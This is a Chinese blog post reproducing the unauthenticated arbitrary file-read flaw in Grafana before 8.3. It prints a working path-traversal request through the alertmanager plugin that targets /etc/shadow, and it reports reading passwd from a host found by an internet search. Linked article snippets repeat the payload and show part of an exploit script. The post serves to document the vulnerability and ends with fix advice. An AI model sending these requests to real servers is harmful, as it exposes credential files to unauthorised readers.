Grafana版本<8.3任意文件读取

最新推荐文章于 2024-09-05 06:12:49 发布
最新推荐文章于 2024-09-05 06:12:49 发布
阅读量724 收藏
点赞数
分类专栏: 漏洞复现 文章标签: http
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l1593572468/article/details/122245813
版权
漏洞复现 专栏收录该内容
39 篇文章 20 订阅 ¥9.90 ¥99.00
订阅专栏
Grafana是一款开源的数据可视化工具,8.3以前的版本存在未授权任意文件读取漏洞。攻击者可利用默认插件构造请求读取服务器任意文件,如/etc/shadow。通过Fofa搜索测试了V7.2.0版本,成功读取passwd文件。官方建议更新到V8.3.1及以上版本以修复此问题。
摘要由CSDN通过智能技术生成

简介

Grafana是一个跨平台、开源的数据可视化网络应用程序平台,用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。目前测试Grafana 8.3之前版本存在未授权任意文件读取漏洞,可以在未经身份验证的情况下可通过默认存在的插件,构造特殊的请求包读取服务器任意文件。

漏洞利用

抓包获取get请求重放数据包

/public/plugins/alertmanager/../../../../../../../../../../etc/shadow

测试

fofa搜索测试,这里版本为V7.2.0

成功读取到passwd文件.

修复建议

更新到V8.3.1以上版本,对漏洞进行了修复。

结语

向上看的同时也要往回看看,所有的路都不容易,我们只能竭尽全力做好当下的努力。

Cheng-Ling
关注
专栏目录
订阅专栏
HBase原理与代码实例讲解
AI天才研究院
05-28 278
HBase是一个分布式、可伸缩、面向列的开源数据库,它建立在Hadoop文件系统之上,可以为海量数据提供随机、实时的读写访问。HBase最初是作为Hadoop项目的一部分进行开发的,后来由Apache软件基金会作为顶级项目独立出来。HBase的设计灵感来自于Google的BigTable论文,它采用了类似的数据模型。HBase非常适合于需要在非结构化的稀疏数据上进行快速查询的场景,例如网络日志分析、内容传递网络等。
AI系统Cassandra原理与代码实战案例讲解
最新发布
AI天才研究院
09-17 1196
AI系统Cassandra原理与代码实战案例讲解 1. 背景介绍 1.1 问题的由来 随着大数据时代的来临,企业级应用程序对数据存储的需求日益增长。传统的数据库解决方案如MySQL、SQL Server等在处理海量数据时,面临着
【漏洞复现】Grafana任意文件读取漏洞(CVE-2021-43798)_grafana漏洞复现
2401_84437170的博客
04-17 866
Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。
Grafana 未授权任意文件读取漏洞
weixin_51387754的博客
12-07 1025
漏洞简介 Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。 Grafana 存在未授权任意文件读取漏洞,攻击者在未经身份验证的情况下可通过该漏洞读取主机上的任意文件。 经测试,目前最新版本Grafana v8.2.6)仍存在漏洞。 漏洞复现 app=“Grafana” 抓包 GET /public/plugins/graph/../../../../../../../../../../../../../../..
CVE-2024-43798——Grafana 未授权任意文件读取_grafana未授权访问
2401_86437209的博客
09-05 309
Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。Grafana 存在未授权任意文件读取漏洞,攻击者在未经身份验证的情况下可通过该漏洞读取主机上的任意文件
Grafana plugins 任意文件读取
梦里明明有六趣,觉后空空无大千
06-09 223
圣人之道,吾性自足,不假外求
Grafana任意文件读取 (CVE-2021-43798)
weixin_63231007的博客
10-07 1083
Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。Grafana 存在未授权任意文件读取漏洞,攻击者在未经身份验证的情况下可通过该漏洞读取主机上的任意文件
CVE-2021-43798——Grafana 未授权任意文件读取
热门推荐
LiBai'S BLOG
12-18 1万+
Grafana 未授权任意文件读取~
[文件读取]Grafana未授权任意文件读取
wj33333的博客
11-14 490
描述: Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。Grafana 存在未授权任意文件读取漏洞,攻击者在未经身份验证的情况下可通过该漏洞读取主机上的任意文件。查看etc/passwd。查看/tmp/flag。
【大数据 OLAP 技术新书推荐】 字节跳动阿里巴巴大厂资深架构师程序员多年实践经验总结《ClickHouse入门、实战与进阶》ClickHouse领域集大成之作,入门标准参考书日常工作案头必备手册
AI天才研究院
06-25 1万+
本书是ClickHouse领域的集大成之作,从基础知识、实现原理、项目实战、扩展应用4个维度全面展开,表述简练清晰、案例丰富实用,既可以作为入门的标准参考书,又适合作为案头速查手册。书中内容是作者在阿里巴巴、字节跳动多年实战经验的总结,得到了字节跳动和阿里巴巴9位大数据专家的高度评价。全书共10章,主要内容如下:第1~3章整体介绍ClickHouse概念、特性、应用场景、技术生态、快速入门和基础数据类型等基础内容,目的是从本质上揭开ClickHouse高性能背后的秘密,帮助读者快速上手实践。
Pulsar原理与代码实例讲解
AI天才研究院
06-16 317
Pulsar作为云原生消息队列,未来将进一步加强与Kubernetes的集成,以更好地适应云环境的需求。
Grafana的使用
weixin_37689012的博客
05-05 681
Grafana的使用简介安装 简介 Grafana是一个跨平台的开源的度量分析和可视化工具,可以通过将采集的数据查询然后可视化的展示,并及时通知。它主要有以下六大特点: 1、展示方式:快速灵活的客户端图表,面板插件有许多不同方式的可视化指标和日志,官方库中具有丰富的仪表盘插件,比如热图、折线图、图表等多种展示方式; 2、数据源:Graphite,InfluxDB,OpenTSDB,Promethe...
Grafana任意文件读取
Cobra的博客
12-08 5019
Grafana任意文件读取 漏洞描述 Grafana存在任意文件读取漏洞,通过默认存在的插件,可构造特殊的请求包读取服务器任意文件 影响版本 Grafana 8.x 漏洞复现 POC HTTP://XXX.XXX.XXX.XXX/public/plugins/插件名称/../../../../../../../../../etc/passwd 检测脚本 import requests import sys args = str(sys.argv[1]) f = open("./
grafana最新任意文件读取分析以及衍生问题解释
weixin_50464560的博客
12-08 1220
0x00 前言 早上看到chybeta发群里这漏洞的推特截图,隐隐约约记得我们也在用,不过我也没咋在意,直到chybeta和p????秒秒钟复现压力来到了我这边。我十分无助的硬着头皮打开github看grafana的最新版本代码,结果花了一中午,终于在吃了个猪肘饭后分析好了。(唉想上吊了) 下面就大概讲讲我是如何以一个不懂GO基础语法的角度来复现该漏洞的。另外后面会解释一下一些其他实际中遇到的情况。 0x01 分析与复现 我们可以借助历史漏洞的思路来简单分析一下 看到这个经典漏洞是先从api.go文件入手
CVE-2021-43798 Grafana任意文件读取复现
weixin_46137328的博客
01-09 1371
0x00 概述Grafana是一个完全开源的度量分析与可视化平台,可对来自各种各种数据源的数据进行查询、分析、可视化处理以及配置告警。Grafana读取文件接口存在未授权,且未对文件地址...
CVE-2021-43798——Grafana 未授权任意文件读取_grafana未授权访问(2)
2401_84519859的博客
05-16 501
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
【漏洞复现】Grafana任意文件读取(CVE-2021-43798)
m0_52923241的博客
03-11 1568
只要是安装了任何一个插件就可以出现任意文件读取,因为是plugins的问题。
Grafana任意文件读取漏洞(CVE-2021-43798)
不光要学,知识要能说出口
12-08 1031
Grafana任意文件读取漏洞(CVE-2021-43798) goby exp声明代码poc集合 声明 本程序仅供于学习交流,请使用者遵守《中华人民共和国网络安全法》,勿将此脚本用于非授权的测试,脚本开发者不负任何连带法律责任。 代码 { "Name": "Grafana Plugins Arbitrary File Read CVE-2021-43798", "Level": "3", "Tags": [ "fileread" ],
CentOS 6.10、7.9及8.3镜像版本对比
【压缩包子文件文件名称列表】中提及的三个tar文件,如centos.8.3.tar、centos.7.9.tar、centos.6.10.tar,显然是为方便下载和分发打包的压缩文件。用户通常需要使用Linux系统中的tar命令来解压缩这些文件。例如,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Cheng-Ling

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值